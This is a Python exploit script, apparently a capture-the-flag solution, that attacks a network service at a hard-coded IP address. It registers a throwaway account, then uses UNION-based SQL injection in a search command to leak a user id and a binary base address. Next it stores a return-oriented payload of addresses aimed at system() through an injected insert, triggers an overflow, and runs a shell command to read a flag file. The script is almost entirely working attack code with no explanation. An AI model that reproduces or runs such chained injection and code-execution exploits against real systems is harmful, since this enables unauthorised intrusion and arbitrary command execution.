final_exploit.py

## final_exploit.py
import random
import socket
import string
import sys
import time

from binascii import hexlify
from binascii import unhexlify

def make_address(offset, address):
    return unhexlify("%016x" % (offset + address))[::-1]

HOST = '88.198.89.199'
PORT = 1234

system_address = -0xebace0

# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.settimeout(2)

s.recv(1024)

# Generate user
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])

# Register
s.sendall("register %s %s\n" % (username, username))
s.recv(1024)

# Login
s.sendall("login %s %s\n" % (username, username))
s.recv(1024)

# Leak userid
s.sendall("search x' union select id from users where name='%s'#\n" % (username))
s.recv(1024)
s.sendall("show 0\n")
userid = int(s.recv(1024)[3:])

# print "Userid: %d" % userid

# Leak base address
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
s.recv(1024)
s.sendall("show 11\n")
s.recv(4)
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
# print "Base address: 0x%x" % offset
s.recv(1024)

# Add dummy value and payload
payload = '\x00' * 56 + '\x02' + '\x00' * 7
payload += make_address(offset, 0x223d)
payload += make_address(offset, 0x2238)
payload += make_address(offset, system_address)
payload += make_address(offset, 0x223d)
payload = hexlify(payload)

s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
s.recv(1024)

# Overflow payload to 0x203d68
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
s.recv(1024)

# Test
s.sendall("add cat /home/user/flag\n")
print s.recv(1024)